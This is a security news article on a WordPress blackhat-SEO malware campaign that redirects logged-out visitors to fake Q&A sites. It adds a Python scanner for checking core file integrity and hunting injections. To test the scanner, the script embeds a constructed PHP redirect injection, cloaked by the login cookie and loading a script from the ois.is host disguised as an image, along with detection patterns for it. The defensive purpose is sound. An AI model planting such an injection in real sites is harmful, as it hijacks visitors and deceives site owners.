A new malicious campaign against WordPress websites has been detected.
Malware Campaign against WordPress Sites: 15,000 Sites Affected
Security researchers have detected “a surge in WordPress malware redirecting website visitors to fake Q&A sites.” The campaign is an example of blackhat SEO: malicious SEO redirects used to push traffic to, and raise the search-engine authority of, sites the attackers control. Discovered by Sucuri researchers, the campaign has affected approximately 15,000 websites, with malicious redirects detected on more than 2,500 websites between September and October 2022. Affected sites contain “a great deal of infected files – nearly 20,000 detections in total,” according to Sucuri’s own findings.
The researchers note that the campaign is rather unusual in that the attackers are promoting only a small number of fake, low-quality Q&A sites. Another curious fact is the large number of infected files per website. Attackers usually keep that number small to reduce the chance of detection. Most of the infected files are WordPress core files, but the malware also injects .php files left behind by other, unrelated malware campaigns.
The top 10 most commonly infected files include the following:
It is also noteworthy that, because the malware tampers with core WordPress operations, the redirects it triggers can execute “in the browsers of whomever visits the site.” To avoid being noticed, the redirect does not fire if the wordpress_logged_in cookie is present or if the current page is wp-login.php. In practice this means a site administrator browsing the site while logged in will not see the redirect; checking the site from a logged-out (or private) browser session is the quickest way to observe it.
What Is the Purpose of This Malicious BlackHat SEO Campaign?
Since this is an example of blackhat SEO, the attackers’ sole purpose is increasing traffic to the above-mentioned low-quality Q&A sites and increasing those sites’ authority with Google. The injected code loads what appears to be a PNG image hosted on the ois[.]is domain. Instead of rendering an image, the response takes the website visitor to a Google search result for one of the malicious Q&A domains.
It is not yet known how the initial infection of the WordPress sites happens. So far, the researchers have not observed WordPress plugin vulnerabilities being leveraged in the campaign. The attackers could be using brute-force attacks against WordPress administrator accounts. To reduce that risk, it is advisable to enable two-factor authentication on administrator accounts and to keep WordPress core, themes and plugins updated.
Performing a core file integrity check is another step that the researchers recommend. “If you can identify any files with this malware make sure to query your file system for any other files containing the same injection; there are almost certainly going to be quite a few others,” Sucuri said.
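The two checks recommended above, a core file integrity comparison and a file-system hunt for the injection, can be scripted. The following is an added example written for this article, not Sucuri’s tooling or any code recovered from the campaign. It assumes a trusted checksum manifest (in production this comes from the WordPress checksum API at https://api.wordpress.org/core/checksums/1.0/?version=<ver>&locale=<loc>, the same data `wp core verify-checksums` uses; here it is built from constructed stand-in files) and a constructed PHP snippet that imitates the behaviour described in the article (redirect gated on the wordpress_logged_in cookie and wp-login.php, delivered through a “PNG” on ois[.]is loaded as a script). The snippet, the file names wp-tmp.php and logo-6.png, and the stand-in core file bodies are all assumptions for illustration, not the real malware.

```python
"""Core-file integrity check plus injection hunt for a WordPress tree.

Added example, not Sucuri's code. All sample files below are constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed stand-ins for clean core files (NOT real WordPress source).
CLEAN_CORE = {
    "wp-cron.php": "<?php\n// stand-in for the WordPress cron entry point\nrequire 'wp-load.php';\n",
    "wp-signup.php": "<?php\n// stand-in for the signup handler\nrequire 'wp-load.php';\n",
    "index.php": "<?php\nrequire 'wp-blog-header.php';\n",
}
# Trusted manifest: file -> MD5. In production fetch it from the WordPress
# checksum API for the exact installed version and locale.
MANIFEST = {name: hashlib.md5(body.encode()).hexdigest() for name, body in CLEAN_CORE.items()}

# Constructed imitation of the described behaviour: only logged-out visitors
# outside wp-login.php get a fake "image" that is really a script. Assumed, not
# the actual injection.
FAKE_INJECTION = (
    "\nif (!isset($_COOKIE['wordpress_logged_in'])"
    " && strpos($_SERVER['REQUEST_URI'], 'wp-login.php') === false) {\n"
    "    echo '<script src=\"https://ois.is/images/logo-6.png\"></script>';\n}\n"
)

# The cookie gate alone appears in legitimate core code, so require BOTH the
# gate and a redirect indicator (the ois.is host, or a .png loaded as a script).
COOKIE_GATE = re.compile(r"wordpress_logged_in|wp-login\.php")
REDIRECT_IOC = re.compile(r"ois\.is|<script[^>]+src=[\"'][^\"']+\.png[\"']", re.IGNORECASE)


def verify_core(root: Path, manifest: dict) -> list:
    """Return manifest entries that are missing or whose MD5 differs on disk."""
    findings = []
    for rel, expected in manifest.items():
        path = root / rel
        if not path.is_file():
            findings.append(f"{rel}: missing")
            continue
        if hashlib.md5(path.read_bytes()).hexdigest() != expected:
            findings.append(f"{rel}: checksum mismatch")
    return findings


def hunt_injection(root: Path) -> list:
    """Return every .php file under root carrying both the cookie gate and the IOC.

    This also catches injected files that are not in the manifest at all, which
    the integrity check cannot see.
    """
    hits = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(errors="replace")
        if COOKIE_GATE.search(text) and REDIRECT_IOC.search(text):
            hits.append(str(path.relative_to(root)))
    return hits


def build_sample_site(root: Path, infect: bool) -> None:
    """Write the constructed sample tree; optionally plant the imitation injection."""
    for name, body in CLEAN_CORE.items():
        (root / name).write_text(body)
    (root / "wp-content" / "uploads").mkdir(parents=True)
    if infect:
        # Appended to a core file: caught by both checks.
        with open(root / "wp-cron.php", "a") as f:
            f.write(FAKE_INJECTION)
        # Stray file outside the manifest (constructed name): caught only by the hunt.
        (root / "wp-content" / "uploads" / "wp-tmp.php").write_text("<?php" + FAKE_INJECTION)


def scan(root: Path) -> dict:
    """Run both checks against a WordPress root and return the findings."""
    return {"core_mismatches": verify_core(root, MANIFEST), "injection_hits": hunt_injection(root)}


def demo(infect: bool = True) -> dict:
    """Build a throwaway sample site and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root, infect)
        return scan(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real installation, point `scan()` at the WordPress root and replace `MANIFEST` with the checksum API response for the installed version; the hunt is deliberately broader than the manifest because, as Sucuri notes, the same injection is likely to sit in several files that a core-only check will never inspect.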
Earlier this year, researchers uncovered another malicious campaign that used SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers used malicious sites packed with keywords of popular software products, and used search engine optimization poisoning to make them show up higher in search results. Mandiant researchers also observed a clever evasion technique which relied on mshta.exe, a Windows-native utility designed to execute Microsoft HTML Application files (HTA).